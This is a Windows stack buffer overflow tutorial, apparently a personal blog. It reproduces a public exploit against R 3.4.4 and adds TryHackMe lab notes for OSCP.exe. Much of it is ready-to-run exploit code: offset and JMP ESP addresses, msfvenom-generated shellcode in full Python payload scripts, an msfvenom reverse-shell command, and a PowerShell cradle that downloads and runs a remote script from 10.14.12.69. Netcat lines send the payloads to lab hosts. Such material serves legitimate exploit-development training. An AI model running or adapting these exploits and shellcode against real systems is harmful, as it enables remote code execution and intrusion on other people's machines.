R 3.4.4 — Buffer Overflow (Vanilla EIP Overwrite)

Hi readers, this is just another Windows buffer overflow walkthrough. We will go through the process step by step, from fuzzing to exploitation.

I will be reproducing this https://www.exploit-db.com/exploits/46265, but in the original submission the author verified it on Windows XP SP3 x86; I will be showing you how to do this attack on Windows 10 x64 with a little bit of tweaking. So let's get started. Open up your mind, ready to learn?

Requirements:

1. Windows 10 x64 (I am using a virtual machine in VMware Workstation)

2. R 3.4.4

https://cran.r-project.org/bin/windows/base/old/3.4.4/R-3.4.4-win.exe

3. Immunity Debugger

https://debugger.immunityinc.com/ID_register.py

4. Python 3 / Python 2 (whatever you prefer; I will be using Python 3)

5. Any OS with Metasploit installed (I am using Kali Linux amd64)

Step 1. Fuzzing

Here we look for a vulnerable injection point: an input that cannot handle a large chunk of data and crashes the application. Any input field that chokes on a long string is a candidate, or a command-line argument in the case of a console application without a GUI. In our case it is Edit > GUI preferences > "Language for menus and messages".

a) Run the following in a Python interpreter and copy the junk characters for testing.

'A'*1000

b) Paste these 1000 A's into "Language for menus and messages" and click OK.

c) The application crashes.

We have a vulnerable injection point!

Step 2. Finding offset

Now our goal is to control EIP, the program counter (it holds the address of the next instruction to execute). For this we will use Immunity Debugger to view the registers at the moment of the crash.

We need to attach Immunity to the vulnerable application. Immunity Debugger is a 32-bit debugger, so the process being attached must be the 32-bit (i386) Rgui; that is also why it is EIP, not RIP, that gets overwritten.

a) Click File > Attach, choose the Rgui process (listed as "Rgui configuration editor") and click Attach.

b) The status in the bottom-right corner reads "Paused". Press Run (F9) to let the process continue.

c) Now switch back to the program and again submit the 1000 'A's.

In the top-right (registers) window EIP reads 41414141 (four 'A's) and ESP points into our buffer of 'A's, so the overwritten return address came straight from our input.

Next we find exactly how many bytes of input come before the four that land in EIP.

We can do this manually (time consuming) or with the Ruby scripts that ship with the Metasploit Framework. I will show the Metasploit scripts.

i) Make sure you have these two Ruby scripts:

pattern_create.rb and pattern_offset.rb, which live in "/usr/share/metasploit-framework/tools/exploit" (on current Kali they are also on the PATH as msf-pattern_create and msf-pattern_offset), or download them from https://github.com/n00ky4u/buffer_overflow_scripts

ii) First copy the output of "pattern_create.rb -l 1000". Here 1000 is the same length we used for fuzzing. The pattern is built so that every 4-byte window is unique, which is what lets us map an EIP value back to a position in the input.

iii) Give this as input to the injection point. (Make sure Immunity is attached before submitting.)

iv) Note/copy the EIP value; we will use it next.

6A41376A

v) Now use pattern_offset.rb, which reports where those 4 bytes sit in the pattern (it takes care of the little-endian byte order for us):

"pattern_offset.rb -l 1000 -q 6A41376A"

This reports offset 292.

vi) Now we test the finding: run 'A'*292 + 'B'*4 in the Python terminal.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

vii) Give this as input to the injection point (make sure Immunity is attached). EIP now reads 42424242, which is nothing but four 'B's in hexadecimal. We control EIP.
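The two Ruby tools above implement a simple scheme that is worth seeing in full. As an added example (not the page's script and not Metasploit's code), here is the same cyclic pattern in Python: pattern_create builds the Aa0Aa1...Zz9 sequence, and pattern_offset repacks the EIP value the debugger shows (big-endian hex) into the little-endian bytes that actually sit on the stack before searching for it. It reproduces both offsets on this page: 6A41376A in a 1000-byte pattern gives 292, and 6F43396E in a 2000-byte pattern (from the TryHackMe notes further down) gives 1978.

```python
#!/usr/bin/env python3
"""Cyclic pattern tools in the style of Metasploit's pattern_create.rb /
pattern_offset.rb.  Added example for this walkthrough; not the page's
script and not Metasploit's code, but it uses the same Aa0Aa1...Zz9 scheme,
so the offsets agree with the Ruby tools."""
import string
import struct

# Triplets (upper, lower, digit): 26*26*10 = 6760 triplets = 20280 bytes,
# within which every 4-byte window is unique.
MAX_UNIQUE = 26 * 26 * 10 * 3


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_UNIQUE)
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip, length):
    """Map the EIP value shown by the debugger back to a byte offset.

    The debugger prints the register as a big-endian hex number ("6A41376A")
    but the bytes sit on the stack little-endian, so the query is repacked
    with "<I" before searching.  Returns None when the value is not in the
    pattern, a sign that EIP was not overwritten by our input at all."""
    if isinstance(eip, str):
        eip = int(eip, 16)
    needle = struct.pack("<I", eip)
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


def eip_check_buffer(offset, marker=b"BBBB"):
    """Step 2 vi: `offset` bytes of filler, then a marker that must show up
    verbatim in EIP (0x42424242 for b"BBBB") if the offset is right."""
    return b"A" * offset + marker


if __name__ == "__main__":
    # Values from this page: R 3.4.4 (1000-byte pattern) and OSCP.exe (2000).
    for eip, length in (("6A41376A", 1000), ("6F43396E", 2000)):
        print("%s -> offset %s" % (eip, pattern_offset(eip, length)))
```

If pattern_offset returns None, the crash did not put your bytes into EIP (for example a SEH overwrite or a crash on a read), and the vanilla EIP approach described here does not apply as is.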

Step 3. Finding bad characters.

In my opinion this is the most tedious step, and I do not know how to do it properly, so I would suggest that you learn it from some other resource. Also, if you are following this tutorial, please let me know: what is your approach for finding bad characters?

a) The only bad character here is \x00.

b) Refer to

https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/

The probe we send is every byte value except the ones already known to be bad (\x00 is left out here), written as a Python 3 bytes literal so the raw values reach the file unchanged:

badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
            b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
            b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
            b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
            b"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
            b"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
            b"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
            b"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

Bad characters that commonly turn up, depending on how the input is parsed:

\n (new line) \x0a

\r (carriage return) \x0d

\0 (string terminator in C) \x00

i.e. \x00\x0a\x0d. Which of these (and which others) are actually bad for a given input can only be established by sending the byte array and comparing what arrives in memory against what was sent.

Step 4. Finding a usable module in the binary.

We will use mona.py, a Python 2 plugin for Immunity Debugger, to pick a module. The point is to find a .dll loaded by the process that was built without the protections that would get in our way: no Rebase and no ASLR (so its addresses are the same on every run) and no SafeSEH. Such a module gives us a fixed address that we can hard-code into EIP.

a) Download mona.py from the Corelan GitHub repository: https://github.com/corelan/mona/blob/master/mona.py

b) Mona has many more features; see the docs for details.

c) Copy "mona.py" to "C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands". On a 32-bit OS the path is "C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands".

d) Open Immunity, make sure the binary is attached, then type "!mona modules" in the command bar at the bottom of Immunity Debugger and press Enter.

We can also set a working directory, so that mona writes its output files (bytearray.bin, logs) there:

!mona config -set workingfolder c:\mona\%p

e) Mona lists all loaded modules with their protection flags. Pick one with Rebase, SafeSEH and ASLR all False, and whose address range contains no bad character (a module mapped at an address with a \x00 byte in it is useless to us). In this case we will use "R.dll".

Step 5. Finding a JMP ESP and generating shellcode.

a) Run "!mona find -s "\xff\xe4" -m R.dll". \xff\xe4 is the opcode for "JMP ESP". At the moment of the crash ESP points just past the overwritten return address, i.e. at the bytes of our input that follow the 4 bytes landing in EIP. If EIP holds the address of a JMP ESP inside R.dll, execution jumps to those bytes, so that is where the shellcode goes. Mona reports every match; pick one whose address contains no bad character (6E595DDB has no \x00). Note these addresses may differ on your machine.

!mona find -s "\xff\xe4" -m R.dll

6E595DDB

b) Now let's build the payload, using the bad-character findings.

i) First generate a payload that opens the calculator with msfvenom. Pass the bad characters with the "-b" option so the encoder avoids them; x86/alpha_upper additionally keeps everything after its short decoder stub within upper-case alphanumerics, which makes it more likely to survive being pasted into a text field.

msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -e x86/alpha_upper -b '\x00' -f c

ii) Copy the generated shellcode into the script; it goes after the return address and the NOP sled.

iii) We may need a small "NOP sled" of "\x90" bytes between the return address and the shellcode. Here it is not optional: the x86/alpha_upper decoder starts with a GetPC sequence (\x89\xe0 mov eax,esp; an FPU instruction \xda\xda; \xd9\x70\xf4 fnstenv [eax-0xc]) that stores the 28-byte FPU environment beginning 12 bytes below ESP, i.e. over the 16 bytes at ESP and above. With the shellcode right at ESP those 16 bytes are the decoder itself, including the "pop edx" (\x5a) that has not run yet; with 9 NOPs in front, the write stops one byte short of it. That is why I used 9 here.

iv) Finally combine everything in a Python 3 script. Since this is Python 3, every string must be a bytes literal (a "b" in front of the string), so that raw byte values are written instead of text.

v) Run the script and the payload is saved to "python3_shellcode.txt" in the same directory. Note that the return address 6E595DDB is written byte-reversed (\xDB\x5D\x59\x6E) because x86 is little-endian.

#!/usr/bin/python3
# msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -e x86/alpha_upper -b '\x00' -f c
shellcode = (b"\x89\xe0\xda\xda\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
             b"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
             b"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
             b"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
             b"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4c\x42\x53\x30\x45"
             b"\x50\x33\x30\x53\x50\x4b\x39\x4d\x35\x56\x51\x4f\x30\x55\x34"
             b"\x4c\x4b\x36\x30\x46\x50\x4c\x4b\x30\x52\x54\x4c\x4c\x4b\x46"
             b"\x32\x55\x44\x4c\x4b\x43\x42\x57\x58\x54\x4f\x4e\x57\x51\x5a"
             b"\x57\x56\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x33\x51\x43\x4c\x43"
             b"\x32\x36\x4c\x31\x30\x39\x51\x38\x4f\x54\x4d\x43\x31\x49\x57"
             b"\x5a\x42\x4c\x32\x46\x32\x50\x57\x4c\x4b\x50\x52\x52\x30\x4c"
             b"\x4b\x31\x5a\x37\x4c\x4c\x4b\x50\x4c\x52\x31\x34\x38\x4d\x33"
             b"\x51\x58\x33\x31\x38\x51\x46\x31\x4c\x4b\x31\x49\x37\x50\x45"
             b"\x51\x58\x53\x4c\x4b\x50\x49\x34\x58\x4b\x53\x56\x5a\x50\x49"
             b"\x4c\x4b\x30\x34\x4c\x4b\x35\x51\x4e\x36\x36\x51\x4b\x4f\x4e"
             b"\x4c\x39\x51\x38\x4f\x34\x4d\x55\x51\x49\x57\x36\x58\x4b\x50"
             b"\x54\x35\x4a\x56\x53\x33\x53\x4d\x4a\x58\x37\x4b\x43\x4d\x47"
             b"\x54\x43\x45\x4a\x44\x30\x58\x4c\x4b\x46\x38\x46\x44\x55\x51"
             b"\x49\x43\x53\x56\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x48\x35"
             b"\x4c\x53\x31\x38\x53\x4c\x4b\x43\x34\x4c\x4b\x55\x51\x48\x50"
             b"\x4d\x59\x37\x34\x31\x34\x57\x54\x51\x4b\x31\x4b\x53\x51\x30"
             b"\x59\x30\x5a\x30\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x51\x4a"
             b"\x4c\x4b\x55\x42\x4a\x4b\x4c\x4d\x51\x4d\x43\x5a\x53\x31\x4c"
             b"\x4d\x4d\x55\x48\x32\x33\x30\x53\x30\x33\x30\x50\x50\x43\x58"
             b"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4a"
             b"\x50\x48\x35\x39\x32\x51\x46\x35\x38\x49\x36\x4c\x55\x4f\x4d"
             b"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x33\x4c\x35\x5a\x4d"
             b"\x50\x4b\x4b\x4d\x30\x32\x55\x33\x35\x4f\x4b\x47\x37\x34\x53"
             b"\x54\x32\x42\x4f\x43\x5a\x35\x50\x30\x53\x4b\x4f\x48\x55\x45"
             b"\x33\x53\x51\x42\x4c\x55\x33\x46\x4e\x52\x45\x42\x58\x53\x55"
             b"\x53\x30\x41\x41")

# JMP ESP inside R.dll at 6E595DDB, written little-endian
ret = b"\xDB\x5D\x59\x6E"

# 292 bytes of filler reach the saved return address, then the JMP ESP
# address, then a 9-byte NOP sled in front of the decoder stub.
buffer = b"A" * 292 + ret + b"\x90" * 9 + shellcode
payload = buffer

try:
    with open("python3_shellcode.txt", "wb") as f:
        f.write(payload)
    print("[+] Created %d byte payload in python3_shellcode.txt" % len(payload))
except OSError as e:
    print("File cannot be created: %s" % e)


Step 6. Exploitation

a) Copy the contents of "python3_shellcode.txt" and give it as input to the injection point. The file holds raw bytes, so open it with a tool that does not re-encode them; a character-set conversion on the way into the dialog changes bytes and breaks the payload, which is one reason an alphanumeric encoder was chosen.

b) Our shellcode executes and the calculator opens.

I would appreciate your suggestions, feedback and queries.

Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)

Buffer Overflow Prep (TryHackMe)

!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"

1. OSCP.exe

a. OVERFLOW1

/usr/bin/msf-pattern_create -l 2000
EIP at crash: 6F43396E
/usr/bin/msf-pattern_offset -q 6F43396E -l 2000

Offset check: b"A" * 1978 + b"BBBB" (1978 A's followed by BBBB)

https://github.com/pswalia2u/bof_scripts/blob/main/bad_chars.py

EIP 42424242
offset: 1978

!mona bytearray -b "\x00"
buffer = prefix + overflow + b"BBBB" + bad_array
echo "$(<badchars_payload.txt)"|nc 10.10.9.46 1337

https://github.com/pswalia2u/bof_scripts/blob/main/find_bad_chars.py

ESP at crash: 0193FA30
!mona compare -f C:\mona\oscp\bytearray.bin -a 0193FA30
mona reports: \x00\x07\x08\x2e\x2f\xa0\xa1 (the byte after each bad char is affected as well)
Actual bad chars: \x00\x07\x2e\xa0
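The over-reporting in that compare output is the part of Step 3 (in the R walkthrough above) that trips people up: one corrupted byte usually drags its neighbour along, so a single compare cannot tell \x07 from \x08. The discipline is to exclude only the first mismatch, regenerate the array and send again, until the probe comes back intact. As an added example (not the page's scripts and not mona), here is that loop in Python against a constructed stand-in target; the stand-in simply replaces each truly bad byte and the byte after it, which reproduces the \x07\x08\x2e\x2f\xa0\xa1 artefact and resolves it to \x00\x07\x2e\xa0.

```python
#!/usr/bin/env python3
"""Bad-character round trip.  Added example for Step 3 of the R walkthrough
and the !mona bytearray / !mona compare notes above; it is not the page's
code and not mona.  The target is a constructed stand-in (an assumption for
the demo) for sending the probe and reading memory at ESP in the debugger."""


def badchar_array(exclude=(0x00,)):
    """Every byte value except the ones already known to be bad, the same
    thing !mona bytearray -b "\\x00..." writes to bytearray.bin."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def all_mismatches(sent, dumped):
    """Naive comparison: every byte that did not survive.  This is the list
    that looks like \\x07\\x08\\x2e\\x2f\\xa0\\xa1: the byte after each real
    bad character is dragged along, so it over-reports."""
    return [b for i, b in enumerate(sent) if i >= len(dumped) or dumped[i] != b]


def first_mismatch(sent, dumped):
    """The only conclusion one comparison supports: the first byte that was
    changed (or the first byte past a truncation) is bad."""
    hits = all_mismatches(sent, dumped)
    return hits[0] if hits else None


def find_badchars(send_and_dump, known=(0x00,)):
    """Iterate: probe without the known bad bytes, compare, add the first
    mismatch, repeat until the probe comes back intact."""
    bad = list(known)
    while True:
        probe = badchar_array(bad)
        hit = first_mismatch(probe, send_and_dump(probe))
        if hit is None:
            return bad
        bad.append(hit)


# Constructed stand-in for the target.  The true bad bytes are the ones the
# OSCP.exe notes ended up with; each one is mangled together with the byte
# that follows it, which reproduces the "next char is affected" artefact.
TRUE_BAD = {0x07, 0x2e, 0xa0}


def fake_target(probe):
    out = bytearray(probe)
    for i, b in enumerate(probe):
        if b in TRUE_BAD:
            out[i] = 0x00
            if i + 1 < len(out):
                out[i + 1] = 0x00
    return bytes(out)


if __name__ == "__main__":
    probe = badchar_array()
    one_shot = all_mismatches(probe, fake_target(probe))
    print("one-shot compare:", [hex(b) for b in one_shot])
    print("iterated result :", [hex(b) for b in find_badchars(fake_target)])
```

Against a real target, replace fake_target with a function that sends the probe (the echo | nc line above, or a socket) and returns the bytes dumped from ESP in the debugger; a truncated dump (shorter than the probe) is reported as a mismatch at the first missing byte, which is how a string-terminating byte shows up.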

Finding JMP address:

!mona modules
!mona find -s "\xff\xe4" -m essfunc.dll
OR
!mona jmp -r esp -cpb <badchars>

625011AF -> b"\xaf\x11\x50\x62" (little-endian)

msfvenom -a x86 -p windows/exec CMD="powershell \"iex(New-Object Net.WebClient).DownloadString('http://10.14.12.69/Invoke-PowerShellTcp2.ps1')\"" --smallest -b "\x00\x07\x2e\xa0" -f python

Full script:

#!/usr/bin/python3
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.14.12.69 LPORT=53 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f python --smallest
# msfvenom -a x86 -p windows/exec CMD="powershell \"iex(New-Object Net.WebClient).DownloadString('http://10.14.12.69/Invoke-PowerShellTcp2.ps1')\"" --smallest -b "\x00\x07\x2e\xa0" -f python
buf = b""
buf += b"\x6a\x49\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
buf += b"\x98\xe0\xc3\xd7\x83\xeb\xfc\xe2\xf4\x64\x08\x41\xd7"
buf += b"\x98\xe0\xa3\x5e\x7d\xd1\x03\xb3\x13\xb0\xf3\x5c\xca"
buf += b"\xec\x48\x85\x8c\x6b\xb1\xff\x97\x57\x89\xf1\xa9\x1f"
buf += b"\x6f\xeb\xf9\x9c\xc1\xfb\xb8\x21\x0c\xda\x99\x27\x21"
buf += b"\x25\xca\xb7\x48\x85\x88\x6b\x89\xeb\x13\xac\xd2\xaf"
buf += b"\x7b\xa8\xc2\x06\xc9\x6b\x9a\xf7\x99\x33\x48\x9e\x80"
buf += b"\x03\xf9\x9e\x13\xd4\x48\xd6\x4e\xd1\x3c\x7b\x59\x2f"
buf += b"\xce\xd6\x5f\xd8\x23\xa2\x6e\xe3\xbe\x2f\xa3\x9d\xe7"
buf += b"\xa2\x7c\xb8\x48\x8f\xbc\xe1\x10\xb1\x13\xec\x88\x5c"
buf += b"\xc0\xfc\xc2\x04\x13\xe4\x48\xd6\x48\x69\x87\xf3\xbc"
buf += b"\xbb\x98\xb6\xc1\xba\x92\x28\x78\xbf\x9c\x8d\x13\xf2"
buf += b"\x28\x5a\xc5\x8a\xc2\x5a\x1d\x52\xc3\xd7\x98\xb0\xab"
buf += b"\xe6\x13\x8f\x44\x28\x4d\x5b\x33\x62\x3a\xb6\xab\x71"
buf += b"\x0d\x5d\x5e\x28\x4d\xdc\xc5\xab\x92\x60\x38\x37\xed"
buf += b"\xe5\x78\x90\x8b\x92\xac\xbd\x98\xb3\x3c\x02\xe8\x8f"
buf += b"\xb4\xb2\xea\x93\xab\xb2\xf4\x8c\xe3\xf5\xf1\x85\xbb"
buf += b"\xff\xd6\x85\xb4\xfa\xd7\x82\xa9\xb2\xfb\x94\xe3\x99"
buf += b"\xfd\x94\xed\x80\xfd\x82\x80\xbb\xf1\x85\xad\xa3\xb1"
buf += b"\xce\x87\xb8\xef\x8e\xaf\xb8\xf9\x84\x90\xa3\xea\x89"
buf += b"\xad\xb0\xb0\xc7\xab\xa3\xec\x90\xf9\xf8\xb7\xd1\xf3"
buf += b"\xf9\xa9\xd4\xed\xe6\xaa\xce\xf5\xee\xb7\xa9\xad\xa1"
buf += b"\xf7\x8b\xa6\xfa\xc8\x8f\xb4\xb2\xea\xb3\xab\xb2\xf4"
buf += b"\x8c\x97\xb4\xe8\xd2\xed\xa7\xeb\xd1\xe4\xfe\xba\xe0"
buf += b"\xc3\xd7"

# full byte array minus \x00, used only for the bad-character run (!mona bytearray -b "\x00")
bad_array = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

prefix = b"OVERFLOW1 "
offset = 1978
overflow = b"A" * offset
# JMP ESP in essfunc.dll at 625011AF, little-endian
retn = b"\xaf\x11\x50\x62"
#retn = b"BBBB"          # used while confirming the offset
shellcode = buf
#buffer = prefix + overflow + retn + bad_array   # used while testing bad chars
buffer = prefix + overflow + retn + b"\x90" * 30 + shellcode
payload = buffer

try:
    with open("final_payload.txt", "wb") as f:
        f.write(payload)
    print("[+] Created %d byte payload in final_payload.txt" % len(payload))
except OSError as e:
    print("File cannot be created: %s" % e)

https://github.com/pswalia2u/bof_scripts/blob/main/gen_final_payload.py

echo "$(<final_payload.txt)"|nc 10.10.83.6 1337

(Bash command substitution cannot carry NUL bytes, one more reason \x00 has to be treated as bad here, and echo appends the newline that terminates the command.)
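The two payload scripts on this page (the R one in Step 5 and the OSCP.exe one just above) hard-code the little-endian return address by hand and do no checking, so a bad byte in the address, the filler or the shellcode only shows up as a crash that looks like everything else. As an added example (not the page's scripts and not mona), here is the assembly step with the checks a practitioner wants: a byte-level search for FF E4 (what "!mona find -s "\xff\xe4"" does, over a constructed module blob, not a real PE), struct.pack for the address, and a bad-character gate over the address and the finished payload. The image base 0x62500000 and the blob are assumptions for the demo; the offsets, addresses and bad-character sets are the ones from this page.

```python
#!/usr/bin/env python3
"""JMP ESP search, address packing and payload assembly with a bad-character
gate.  Added example covering Steps 4 to 6 of the R walkthrough and the
OSCP.exe script above; it is not the page's script and not mona.  The module
image scanned below is a constructed blob and its base address is assumed;
mona resolves real PE section mappings, this does not."""
import struct

JMP_ESP = b"\xff\xe4"  # opcode bytes of "jmp esp"


def find_jmp_esp(image, image_base):
    """Virtual addresses of every FF E4 in `image`, treating file offset as
    RVA (true for the constructed blob; a real PE needs its section table)."""
    found, i = [], image.find(JMP_ESP)
    while i != -1:
        found.append(image_base + i)
        i = image.find(JMP_ESP, i + 1)
    return found


def pack_addr(addr):
    """Little-endian encoding, e.g. 0x6E595DDB -> b"\\xDB\\x5D\\x59\\x6E"."""
    return struct.pack("<I", addr)


def check_badchars(blob, badchars):
    """(index, byte) for every bad byte in blob; an empty list means clean."""
    return [(i, b) for i, b in enumerate(blob) if b in badchars]


def usable_address(addr, badchars):
    """An address is usable only if none of its 4 bytes is a bad character;
    a single \\x00 in it would cut the input off before the shellcode."""
    return not check_badchars(pack_addr(addr), badchars)


def build_payload(offset, ret_addr, shellcode, badchars, prefix=b"", nops=16):
    """prefix + filler + JMP ESP address + NOP sled + shellcode, refusing to
    emit anything that contains a bad character (filler and NOPs included)."""
    if not usable_address(ret_addr, badchars):
        raise ValueError("return address 0x%08X contains a bad character" % ret_addr)
    payload = prefix + b"A" * offset + pack_addr(ret_addr) + b"\x90" * nops + shellcode
    hits = check_badchars(payload, badchars)
    if hits:
        raise ValueError("bad byte(s) in payload at %s" %
                         ", ".join("%d:0x%02x" % h for h in hits[:8]))
    return payload


# Constructed module image: FF E4 placed at RVA 0x11AF so that the assumed
# base 0x62500000 reproduces the essfunc.dll address 625011AF from the notes.
IMAGE_BASE = 0x62500000
MODULE_IMAGE = b"\x90" * 0x11AF + JMP_ESP + b"\xcc" * 32

OSCP_BADCHARS = {0x00, 0x07, 0x2e, 0xa0}  # from the !mona compare notes
R_BADCHARS = {0x00}                        # from Step 3 of the R walkthrough

if __name__ == "__main__":
    addrs = find_jmp_esp(MODULE_IMAGE, IMAGE_BASE)
    print("JMP ESP candidates:", ["0x%08X" % a for a in addrs])
    print("6E595DDB packs to :", pack_addr(0x6E595DDB))
    # placeholder shellcode (int3 x4) so the demo runs without msfvenom output
    demo = build_payload(1978, addrs[0], b"\xcc" * 4, OSCP_BADCHARS,
                         prefix=b"OVERFLOW1 ", nops=30)
    print("[+] assembled %d byte payload" % len(demo))
```

Drop the msfvenom output in place of the int3 placeholder and write the result with open(..., "wb") as the page's scripts do; the bad-character gate then catches the case where the shellcode was generated with the wrong -b list before anything is sent.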
